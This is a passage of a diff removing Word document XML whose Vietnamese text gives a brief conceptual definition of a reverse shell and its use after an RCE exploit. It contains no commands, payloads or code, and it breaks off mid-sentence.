-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>về</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> reverse shell</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Reverse shell </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>là</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 1 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>loại</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> session shell (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>ngoài</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>ra</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>còn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>có</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> web shell, bind </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>shell,..</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ) </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>là</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> shell </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>có</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>kết</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>nối</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>bắt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>nguồn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>từ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 1 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>máy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>chủ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>đóng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>vai</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>trò</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>là</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> target </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>đến</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 1 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>máy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>chủ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>khác</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>đóng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>vai</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>trò</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> host . </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Khi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>đó</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> target </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>sẽ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>tạo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>kết</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>nối</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>ra</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>bên</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>ngoài</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>và</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> host </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>sẽ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>lắng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>nghe</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Trong</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>trường</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>hợp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Attacker </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>mà</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>đã</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>khai</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>thác</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>được</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>lỗ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>hổng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>có</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>thể</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>dẫn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>đến</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> RCE </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>có</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>thể</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>dùng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Reverse shell </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>để</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>tạo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>kết</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>nối</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>đến</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>máy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> attacker </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>để</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> hacker </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>thao</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
